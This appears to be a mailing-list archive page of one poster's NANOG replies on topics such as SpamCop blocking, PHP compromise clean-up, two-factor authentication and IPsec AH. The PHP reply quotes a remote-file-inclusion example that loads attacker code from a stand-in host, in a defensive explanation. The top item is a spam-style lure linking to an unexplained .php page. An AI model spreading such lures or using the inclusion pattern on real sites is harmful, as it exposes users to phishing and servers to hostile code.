Fw: new message
Hey! New message, please read <http://brazilsail.com/sad.php?wf1ta> Adam Stasiniewicz
RE: Off-Topic: use laptop only as USB power supply
My last Lenovo laptop had a setting in the BIOS for exactly that. Worked great for hotel rooms (which notoriously have very few power plugs) when I wanted to charge my cell phone and other devices over night. No clue about other vendors. Hope that helps, Adam -Original Message- From: Matthias Flittner [mailto:matthias.flitt...@de-cix.net] Sent: Thursday, May 20, 2010 6:15 PM To: nanog@nanog.org Subject: Off-Topic: use laptop only as USB power supply -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi there, I'm not sure if anyone out there has an answer to this insane question: But is it possible to use my laptop only has power supply via usb for my mobile phone. Yes you heard right: I don't want to boot an operating system I only want to charge my battery of my mobile phone. No fan should be powered on. I only need voltage on the USB ports. Any suggestions? ;) best regards, FliTTi -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJL9bR2AAoJEIZn8Rym6s4A1TgH+gNSd8TRW34dvzgS03uTHKvi iZ3f+nciMeaJSN7Pq9Eugi3pgGvljKArcCiEmlV95BIP1i6hJiDuO7sOp/xx4yeO n8/iW6FyPBv5pqjuyhuTjs4GuG7ar4lM6/y4sYPT++bf5fWfwxjonYnmZakw2IVa 3fdsHeOIoyD45lirthSXXmynl/UO4ajYEwI+dqs2vpYcUYTgBW4WhQ1zMnVKJasn PtpuMx1M3a3xF3rFZ6PZ2KmtVRQhjpgaU1TYZO2jcABoKS9e7s2j5zFR+0nhIqzK hq2mQWGlA49Lgt+P21jsaJ8YZxD4AvZFnDXg3flR/FFTVIfVcWoQELvnWwv9iqs= =k+ae -END PGP SIGNATURE-
RE: NSP-SEC
IMHO, I think you have it backwards. I see strategic discussions (like new crypto algorithms, technologies, initiatives, etc) should be open to public debate, review, and scrutiny. But operational/tactical discussions (like new malware, software exploits, virus infected hosts, botnets, etc) don't need public review. Rather, those types of communications should be streamlined that would allow for quick resolution. -Original Message- From: David Barak [mailto:thegame...@yahoo.com] Sent: Friday, March 19, 2010 8:55 AM To: neno...@systeminplace.net; j...@cymru.com Cc: nanog@nanog.org Subject: Re: NSP-SEC Total transparency in security matters works about as well as it would for law enforcement: fine for tactical concerns, but not so great for long-term strategic concerns. -David Barak On Fri Mar 19th, 2010 9:44 AM EDT William Pitcock wrote: On Fri, 2010-03-19 at 08:31 -0500, John Kristoff wrote: An ongoing area of work is to build better closed, trusted communities without leaks. Have you ever considered that public transparency might not be a bad thing? This seems to be the plight of many security people, that they have to be 100% secretive in everything they do, which is total bullshit. Just saying. William
RE: Spamcop Blocks Facebook?
Found this: http://forum.spamcop.net/forums/index.php?showtopic=10783 Looks like SpamCop is fully aware they are listing facebook's email servers. -Original Message- From: Shon Elliott [mailto:s...@unwiredbb.com] Sent: Thursday, February 25, 2010 9:15 PM To: nanog@nanog.org nanog Subject: Spamcop Blocks Facebook? So I start trying to figure out why my facebook account keeps saying my e-mail is invalid, when I know it isn't. I look at my mail server and see it's all running just fine, and have been receiving mail from others just fine... so I tail the log and tell Facebook to re-confirm the address... Feb 25 19:08:18 postfix/smtpd[12682]: connect from outmail011.snc1.tfbnw.net[69.63.178.170] Feb 25 19:08:18 postfix/smtpd[12682]: NOQUEUE: reject: RCPT from outmail011.snc1.tfbnw.net[69.63.178.170]: 554 5.7.1 Service unavailable; Client host [69.63.178.170] blocked using bl.spamcop.net; Blocked - see http://www.spamcop.net/bl.shtml?69.63.178.170; from=notification+m35-v...@facebookmail.com to=exam...@example.com proto=ESMTP helo=mx-out.facebook.com Feb 25 19:08:23 postfix/smtpd[12682]: disconnect from outmail011.snc1.tfbnw.net[69.63.178.170] Anyone from Facebook or Spamcop lurking around to look into this? It's quite annoying.. I can't imagine how many other users are scratching their heads on this one... -S
RE: Security Guideance
I've seem similar. Another variant of this is PHP code that lets arbitrary data be inputted into require() or include() statements, for example: include('http://evilsite.com/evil.txt'). That way, the attacker can then load whatever code they want and it will never be saved to the file system. I would recommend verifying that all the shrink-wrapped products (i.e. forums, blogs, CMS, etc) on the server be checked to ensure that they at the most current update/patch and are not EOL. Generally most of those vendors are good at responding to security issues in their products, but it's up to the person running the website to update their code. Also, have you considered enabling SELinux? Enforcing the targeted policy will prevent Apache from making outbound socket connections (and may break other stuff), but it might be worth the headache. On a similar note, mod_security also may help (depending on how the attack is being launched) but again may break some things. If the attack is possibly being launched via SSH/shell access, enable password complexity then force all of your clients to change their password. Hope that helps, Adam Stasiniewicz -Original Message- From: Chris Adams [mailto:cmad...@hiwaay.net] Sent: Tuesday, February 23, 2010 2:56 PM To: Matt Sprague Cc: nanog@nanog.org Subject: Re: Security Guideance Once upon a time, Matt Sprague mspra...@readytechs.com said: The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged onto the server at the time of the attack to narrow down your search. I like the split the users idea, though it could be several iterations to narrow down the culprit. We've also seen this with spammers. They'll upload a PHP via a compromised account, connect to it via HTTP, and then delete it from the filesystem. The PHP continues to run, Apache doesn't log anything (because it only logs at the end of a request), and the admin is left scratching his head to figure out where the problem is. IIRC PHP holds an open file descriptor on active scripts, so you can use lsof to look for things like this (look for deleted or path inode entries). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
RE: Smartcard and non-password methods (was Re: Password repository)
Sadly, passwords are the least common denominator. The biggest problems with 2 factor devices (smart cards, OTPs, etc) is having to buy, configure, and distribute them; plus get them to work with all the myriad of applications. Certificates that are issued to computers/web browsers suffer from a lack of portability (i.e. by design, the user shouldn't be able to export and share the certificate with anyone they want). Plus with any solution using certificates (client or smart card) a substantial reconfiguration is required to support websites/applications being able to process certificate logons. IMHO, even though OTPs are the less secure of the two types of two-factor products, I see them growing faster than any other method. From an end-user perspective, they are small/portable, don't require a reader, and don't require any special OS, web browser, or software. For an infrastructure perspective, it is easier to convert a website to support OTPs (simply change the function that runs the password validation; instead of having to install and configure a special module/component that would handle the mutual auth required by certificates). Also, many of the OTP vendors are working on making their products function more easily cross platform (while with smart cards, you are basically stuck with either the Microsoft's corporate/non-service provider friendly solution, or have to code your own). My $0.02, Adam Stasiniewicz -Original Message- From: Sean Donelan [mailto:s...@donelan.com] Sent: Friday, November 20, 2009 5:43 PM To: nanog@nanog.org Subject: Smartcard and non-password methods (was Re: Password repository) Are any network providers supporting smartcards or other non-password based authentication methods? Passwords always end up blaming the user for choosing/not remembering good passwords instead of blaming the technology for choosing/not doing things so the user isn't forced to work around its flaws. I know about the DOD Common Access Card. One-time code-generator tokens seem more widely used by single enterprises. But inter-operable credentials still seem to be one of those great unsolved problems for compter security. Are passwords still the only lowest-common-denominator?
RE: AH is pretty useless and perhaps should be deprecated
I have see AH used in network segmentation. I.e. systems is group A are configured with rules to require all communication be over AH. Systems in group B (which have no AH and no appropriate certificates configured) can't chat with group A. The benefit of using AH vs. ESP in this case is twofold. First, AH is less CPU intensive, and when one considers enabling it on all/many workstations and servers in a company, that can add up to a lot of CPU cycles. Second, since AH only signs, not encrypts, products like network analyzers, IDS/IPS, etc can still perform their functions. Outside of some manual deployments, the only commercial product I know that offers AH based network segmentation is Microsoft's NAP: http://www.microsoft.com/nap Regards, Adam Stasiniewicz -Original Message- From: Jack Kohn [mailto:kohn.j...@gmail.com] Sent: Friday, November 13, 2009 6:23 PM To: nanog@nanog.org Subject: AH is pretty useless and perhaps should be deprecated Hi, Interesting discussion on the utility of Authentication Header (AH) in IPSecME WG. http://www.ietf.org/mail-archive/web/ipsec/current/msg05026.html Post explaining that AH even though protecting the source and destination IP addresses is really not good enough. http://www.ietf.org/mail-archive/web/ipsec/current/msg05056.html What do folks feel? Do they see themselves using AH in the future? IMO, ESP and WESP are good enough and we dont need to support AH any more .. Jack